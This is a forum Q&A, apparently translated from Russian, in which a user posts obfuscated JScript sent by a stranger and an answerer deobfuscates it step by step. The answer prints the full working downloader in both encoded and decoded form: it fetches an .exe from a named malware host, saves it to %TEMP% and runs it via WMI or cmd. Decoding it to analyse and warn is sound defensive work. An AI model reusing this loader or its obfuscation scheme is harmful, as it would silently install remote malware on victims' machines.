Question:
Good afternoon. A stranger tried to drop a resume in a .doc file. The editors did not open it. Then he threw me the .scr file. I refused to execute it. He threw me .js:
function Byhezo(Upabyd){
var Yt="56"+"4a"+"58";var Ra="4a"+"52"+"55"+"48"+"4f";
return(new this["F"+"u"+"n"+"c"+"t"+"i"+"o"+"n"](Upabyd)());
}
function Hucana(Deru){
Yc = "4ag6pcSMXtuL05s7zUGW2v9qxdewOyCinTD3PFZEVINbABrYoQHR18hlfjm";
Ry = Yc["charAt"](Deru);
try {
Jime = Yc["charAt"](Deru);
Byhezo(Jime+","+Jime);}
catch (Wa) {
var Napu = Wa["message"];
var Fyby = Napu["substring"]("1", "2");
return Fyby;
}
return Ry;}
//А дальше долгий код Hucana("{...}")
var Egaz=Hucana("21") + Hucana("1") + Hucana("46") + " " + Hucana("44")
We talked in a cart. There is an assumption that this is not a good person.
I can drop his files. .doc, .js, .scr Write to cart @vadim_bondar
Answer:
This is obfuscated code and some Trojan thread is probably hidden behind it. You can reverse engineer and understand what it does. To do this, right in the editor, you can try to "compile in your head" 🙂 – unwind the source in the opposite direction and get the original code. (Throw it to me, I'll try it too, it's very exciting in fact). You can try it yourself. Here is one example of how to do it – Reverse engineering of a malicious fraudulent script
UPD .:
Ready! So, at the very beginning we have a source of the form:
function Byhezo(Upabyd) {
var Yt = "56" + "4a" + "58";
var Ra = "4a" + "52" + "55" + "48" + "4f";
return (new this["F" + "u" + "n" + "c" + "t" + "i" + "o" + "n"](Upabyd)());
}
function Hucana(Deru) {
Yc = "4ag6pcSMXtuL05s7zUGW2v9qxdewOyCinTD3PFZEVINbABrYoQHR18hlfjm";
Ry = Yc["charAt"](Deru);
try {
Jime = Yc["charAt"](Deru);
Byhezo(Jime + "," + Jime);
} catch (Wa) {
var Napu = "'" + Wa["message"];
var Fyby = Napu["substring"]("1", "2");
return Fyby;
}
return Ry;
}
var Egaz = Hucana("21") + Hucana("1") + Hucana("46") + " " + Hucana("44") + /* 150 кб текста */ + ")" + ";";
Byhezo(Egaz);
The Egaz variable Egaz the source of the future loader js-code. For this, a decoder is used – the Hucana function and the Yc key in it. The function bites out the desired byte at the offset and executes it through Byhezo (which in turn executes (new Function('внедряемый код'))() ). In case of an error (only works in IE!), The decoder returns the second byte of the error text, otherwise the decoded character from the key.
If you comment out the very last line and see what has accumulated in it, then we will get a preliminary source of the loader (I replaced the original Ajosesitufowyzyzygoqol with a short _ ):
var _ = ["\x64", "\x61", "\x68", "\x49", "\x52", "\x4f", "\x63", "\x79", "\x4e", "\x48", "\x39", "\x65", "\x43", "\x54", "\x73", "\x47", "\x32", "\x72", "\x59", "\x55", "\x37", "\x4c", "\x58", "\x70", "\x6f", "\x7a", "\x38", "\x78", "\x31", "\x4d", "\x53", "\x69", "\x6e", "\x71", "\x41", "\x67", "\x51", "\x33", "\x76", "\x42", "\x6c", "\x6a", "\x62", "\x50", "\x5a", "\x46", "\x74", "\x66", "\x35", "\x75", "\x45", "\x77", "\x30", "\x6d", "\x44", "\x34", "\x36", "\x57", "\x56", "\x2e", "\x2e\x65", "\x25", "\x39\x32", "\x31\x30\x30\x30\x30\x30\x30\x30\x30", "\x2e\x65\x78\x65", "\x77\x69\x6e\x6d\x67\x6d\x74\x73\x3a\x57\x69\x6e\x33\x32\x5f\x50\x72\x6f\x63\x65\x73\x73", "\x32\x30", "\x20", "\x2f", "\x3a", "\x2d"];
function Zevo(Agyz, Ul) {
var Isag = _[0] + _[1] + _[2] + _[3] + _[4] + _[5] + _[6] + _[7] + _[8] + _[9] + _[10] + _[11] + _[12] + _[13] + _[14] + _[15] + _[16] + _[17] + _[18] + _[19] + _[20] + _[21] + _[22] + _[23] + _[24] + _[25] + _[26] + _[27] + _[28] + _[29] + _[30] + _[31] + _[32] + _[33] + _[34] + _[35] + _[36] + _[37] + _[38] + _[39] + _[40] + _[41] + _[42] + _[43] + _[44] + _[45] + _[46] + _[47] + _[48] + _[49] + _[50] + _[51] + _[52] + _[53] + _[54] + _[55] + _[56] + _[57] + _[58];
try {
var sc = this[_[14] + _[6] + _[17] + _[11] + _[11] + _[32]][_[51] + _[31] + _[0] + _[46] + _[2]];
} catch (ers) {
var Uduh = new this[_[34] + _[6] + _[46] + _[31] + _[38] + _[11] + _[22] + _[5] + _[42] + _[41] + _[11] + _[6] + _[46]](_[57] + _[30] + _[6] + _[17] + _[31] + _[23] + _[46] + _[59] + _[30] + _[2] + _[11] + _[40] + _[40]);
if (Ul == _[60] + _[27] + _[11]) {
var Qi = Uduh[_[50] + _[27] + _[23] + _[1] + _[32] + _[0] + _[50] + _[32] + _[38] + _[31] + _[17] + _[24] + _[32] + _[53] + _[11] + _[32] + _[46] + _[30] + _[46] + _[17] + _[31] + _[32] + _[35] + _[14]](_[61] + _[13] + _[50] + _[29] + _[43] + _[61]) + this[_[30] + _[46] + _[17] + _[31] + _[32] + _[35]][_[47] + _[17] + _[24] + _[53] + _[12] + _[2] + _[1] + _[17] + _[12] + _[24] + _[0] + _[11]](_[62]) + this[_[29] + _[1] + _[46] + _[2]][_[17] + _[24] + _[49] + _[32] + _[0]](this[_[29] + _[1] + _[46] + _[2]][_[17] + _[1] + _[32] + _[0] + _[24] + _[53]]() * _[63]) + _[64];
}
var Boxa = 0;
var Fihali = new this[_[34] + _[6] + _[46] + _[31] + _[38] + _[11] + _[22] + _[5] + _[42] + _[41] + _[11] + _[6] + _[46]](_[29] + _[30] + _[22] + _[29] + _[21] + _[16] + _[59] + _[22] + _[29] + _[21] + _[9] + _[13] + _[13] + _[43]);
Fihali[_[24] + _[32] + _[17] + _[11] + _[1] + _[0] + _[7] + _[14] + _[46] + _[1] + _[46] + _[11] + _[6] + _[2] + _[1] + _[32] + _[35] + _[11]] = function () {
if (Fihali[_[17] + _[11] + _[1] + _[0] + _[7] + _[30] + _[46] + _[1] + _[46] + _[11]] == _[55] && Fihali[_[14] + _[46] + _[1] + _[46] + _[49] + _[14]] == _[16] + _[52] + _[52]) {
var Capo = new this[_[34] + _[6] + _[46] + _[31] + _[38] + _[11] + _[22] + _[5] + _[42] + _[41] + _[11] + _[6] + _[46]](_[34] + _[54] + _[5] + _[54] + _[39] + _[59] + _[30] + _[46] + _[17] + _[11] + _[1] + _[53]);
Capo[_[24] + _[23] + _[11] + _[32]]();
Capo[_[46] + _[7] + _[23] + _[11]] = _[28];
Capo[_[51] + _[17] + _[31] + _[46] + _[11]](Fihali[_[4] + _[11] + _[14] + _[23] + _[24] + _[32] + _[14] + _[11] + _[39] + _[24] + _[0] + _[7]]);
if (Capo[_[14] + _[31] + _[25] + _[11]] > _[52]) {
Boxa = _[28];
Capo[_[23] + _[24] + _[14] + _[31] + _[46] + _[31] + _[24] + _[32]] = _[52];
Capo[_[14] + _[1] + _[38] + _[11] + _[13] + _[24] + _[45] + _[31] + _[40] + _[11]](Qi, _[16]);
try {
if (Ul == _[64]) {
var result = _[0];
try {
var processid;
var query = GetObject(_[65]);
result = query.Create(Qi, null, null, processid);
} catch (er) {
var result = _[66];
}
if (result = !_[52]) {
Uduh[_[4] + _[49] + _[32]](_[6] + _[53] + _[0] + _[67] + _[68] + _[6] + _[67] + Qi, _[52], _[52]);
}
}
} catch (er) {
}
;
}
;Capo[_[6] + _[40] + _[24] + _[14] + _[11]]();
}
;
};
try {
Fihali[_[24] + _[23] + _[11] + _[32]](_[15] + _[50] + _[13], Agyz, _[47] + _[1] + _[40] + _[14] + _[11]);
Fihali[_[14] + _[11] + _[32] + _[0]]();
} catch (er) {
}
;
}
};
Zevo(_[2] + _[46] + _[46] + _[23] + _[69] + _[68] + _[68] + _[14] + _[1] + _[53] + _[7] + _[17] + _[1] + _[31] + _[20] + _[20] + _[20] + _[53] + _[59] + _[23] + _[70] + _[2] + _[24] + _[14] + _[46] + _[59] + _[31] + _[32] + _[68] + _[20] + _[20] + _[20] + _[59] + _[11] + _[27] + _[11], _[64]);
This code is still incomprehensible to us, but it is enough to write a small decoder in php …
$Ajosesitufowyzyzygoqol = ["\x64", "\x61", /* вырезано для экономии места */ "\x3a", "\x2d"];
$src = <<<GOVNO
тут исходник из js
GOVNO;
foreach ($Ajosesitufowyzyzygoqol as $i => $char) {
$src = str_replace('_['.$i.']', '"' . $char . '"', $src);
}
$src = str_replace('" + "', '', $src);
file_put_contents(__DIR__ . "/tmp.txt", $src);
… and run it as we get a friendlier source format:
function Zevo(Agyz, Ul) {
var Isag = "dahIROcyNH9eCTsG2rYU7LXpoz8x1MSinqAgQ3vBljbPZFtf5uEw0mD46WV";
try {
var sc = this["screen"]["width"];
} catch (ers) {
var Uduh = new this["ActiveXObject"]("WScript.Shell");
if (Ul == ".exe") {
var Qi = Uduh["ExpandEnvironmentStrings"]("%TEMP%") + this["String"]["fromCharCode"]("92") + this["Math"]["round"](this["Math"]["random"]() * "100000000") + ".exe";
}
var Boxa = 0;
var Fihali = new this["ActiveXObject"]("MSXML2.XMLHTTP");
Fihali["onreadystatechange"] = function () {
if (Fihali["readyState"] == "4" && Fihali["status"] == "200") {
var Capo = new this["ActiveXObject"]("ADODB.Stream");
Capo["open"]();
Capo["type"] = "1";
Capo["write"](Fihali["ResponseBody"]);
if (Capo["size"] > "0") {
Boxa = "1";
Capo["position"] = "0";
Capo["saveToFile"](Qi, "2");
try {
if (Ul == ".exe") {
var result = "d";
try {
var processid;
var query = GetObject("winmgmts:Win32_Process");
result = query.Create(Qi, null, null, processid);
} catch (er) {
var result = "20";
}
if (result = !"0") {
Uduh["Run"]("cmd /c " + Qi, "0", "0");
}
}
} catch (er) {
//
}
}
Capo["close"]();
}
};
try {
Fihali["open"]("GET", Agyz, "false");
Fihali["send"]();
} catch (er) {
//
}
}
}
Zevo("http://samyrai777m.p-host.in/777.exe", ".exe");
And what do we see here ?! Oh my God! Yes, this is the executable loader and its launch right in your favorite Windows!
The file is saved to a temporary folder with a random name var Qi = Uduh["ExpandEnvironmentStrings"]("%TEMP%") + this["String"]["fromCharCode"]("92") + this["Math"]["round"](this["Math"]["random"]() * "100000000") + ".exe";
The rest I think is clear and so. I do not advise you to follow the link and run the application from the last line of the source code.